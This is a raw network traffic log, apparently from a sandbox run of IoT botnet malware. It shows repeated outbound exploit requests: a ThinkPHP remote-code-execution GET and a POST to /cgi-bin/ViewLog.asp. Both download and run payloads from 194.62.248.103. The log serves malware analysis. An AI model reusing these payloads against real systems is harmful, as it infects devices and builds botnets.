                                                        Apr 14, 2024 16:35:44.788894892 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:45.073086023 CEST106INHTTP/1.1 400
                                                        Transfer-Encoding: chunked
                                                        Date: Sun, 14 Apr 2024 14:37:46 GMT
                                                        Connection: close
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        304192.168.2.2344276112.50.109.21080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.839884996 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:45.182029963 CEST480INHTTP/1.1 400 Bad Request
                                                        Server: Tengine
                                                        Date: Sun, 14 Apr 2024 14:35:45 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 249
                                                        Connection: close
                                                        Via: live5.cn6526[,0]
                                                        Timing-Allow-Origin: *
                                                        EagleId: 0000000017131053450072748e
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        305192.168.2.2344272112.50.109.21080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.857836962 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:45.218226910 CEST481INHTTP/1.1 400 Bad Request
                                                        Server: Tengine
                                                        Date: Sun, 14 Apr 2024 14:35:45 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 249
                                                        Connection: close
                                                        Via: live10.cn6526[,0]
                                                        Timing-Allow-Origin: *
                                                        EagleId: 0000000017131053450368143e
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        306192.168.2.2355076112.213.90.14880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.884346008 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:45.264384985 CEST303INHTTP/1.0 404 Not Found
                                                        X-Frame-Options: sameorigin
                                                        X-XSS-Protection: 1
                                                        Server: WDaemon/4.0
                                                        Date: Sun, 14 Apr 2024 14:35:45 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 93
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 0d 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 3c 2f 42 4f 44 59 3e 0d 0a 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        307192.168.2.234889031.134.156.2308080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.975210905 CEST268INHTTP/1.0 400 Bad Request
                                                        Server: httpd
                                                        Date: Sun, 14 Apr 2024 14:35:44 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        308192.168.2.233322495.100.83.7880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:45.500066042 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:45.807846069 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:35:45 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:45 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 34 61 30 64 35 31 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 35 26 23 34 36 3b 33 63 33 37 66 62 65 38 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 64 34 61 30 64 35 31 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 35 26 23 34 36 3b 33 63 33 37 66 62 65 38 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;d4a0d517&#46;1713105345&#46;3c37fbe8<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;d4a0d517&#46;1713105345&#46;3c37fbe8</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        309192.168.2.235581295.161.215.21880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:45.536225080 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:45.880752087 CEST117INHTTP/1.1 500 Server Error
                                                        Content-Length: 48
                                                        Date: Sun, 14 Apr 2024 14:35:45 GMT
                                                        Connection: close
                                                        Apr 14, 2024 16:35:45.880870104 CEST60INData Raw: 45 72 72 6f 72 20 35 30 30 3a 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 43 6c 69 65 6e 74 20 63 6c 6f 73 65 64 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                        Data Ascii: Error 500: Server ErrorClient closed connection


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        310192.168.2.235317895.153.254.5080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:45.910221100 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:46.616158009 CEST49INHTTP/1.1 404 Site or Page Not Found
                                                        Apr 14, 2024 16:35:46.630033970 CEST385INData Raw: 53 65 72 76 65 72 3a 20 47 6f 41 68 65 61 64 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 53 75 6e 20 41 70 72 20 31 34 20 31 37 3a 33 35 3a 34 33 20 32 30 32 34 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d
                                                        Data Ascii: Server: GoAhead-WebsDate: Sun Apr 14 17:35:43 2024Cache-Control: no-store, no-cache, must-revalidateCache-Control: post-check=0, pre-check=0Pragma: no-cacheExpires: -1Content-Type: text/html<html><head><title>Document Error: Site o


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        311192.168.2.233948685.214.73.1968080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:45.950067997 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:46.903467894 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:47.214474916 CEST359INHTTP/1.1 200 OK
                                                        Transfer-Encoding: chunked
                                                        Date: Sun, 14 Apr 2024 14:35:47 GMT
                                                        Server: Warp/3.3.5
                                                        Content-Encoding: gzip
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 30 30 41 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 6d 8e 41 0b 82 40 10 85 ef fd 8a e9 2e bb 6e 44 58 0c 73 b1 4e 1d ea 20 44 47 73 87 76 41 1d d1 49 b0 5f 9f e8 b5 d3 83 8f 8f f7 1e 6e cf b7 bc 78 de 2f 10 b4 a9 69 83 4b 60 e0 d2 13 6a d4 9a e9 c1 75 25 0d 83 0a 5c 59 b9 47 bb 72 b4 ab f5 12 3f 11 06 f7 47 9c 21 76 54 04 86 20 83 b6 e5 dc 32 c9 07 42 39 32 74 bd 8c d1 b3 4f 00 2b f1 4c ee b8 33 ee 90 99 d4 b8 fd 29 4b d1 2e 34 81 38 40 2b 0a 3d 57 f2 6e e3 97 bd 41 db 11 da 75 d6 2e 7f 7f ef 66 95 0c c6 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 00A6mA@.nDXsN DGsvAI_nx/iK`ju%\YGr?G!vT 2B92tO+L3)K.48@+=WnAu.f0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        312192.168.2.234899631.136.253.2168080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:45.950203896 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:46.915158033 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:48.863095045 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:52.766376019 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:00.701502085 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:16.314991951 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:47.542659044 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        313192.168.2.234814431.200.43.518080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:45.968926907 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        314192.168.2.234926294.122.24.28080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:45.969175100 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        315192.168.2.235905262.29.3.1628080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:45.969456911 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        316192.168.2.234315694.122.15.2398080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:45.970832109 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        317192.168.2.234596031.223.63.2208080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:45.980753899 CEST1289INHTTP/1.1 400 Bad Request
                                                        Server: ZTE web server 1.0 ZTE corp 2015.
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        Content-Security-Policy: frame-ancestors 'self' data:
                                                        Cache-Control: no-cache,no-store
                                                        Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 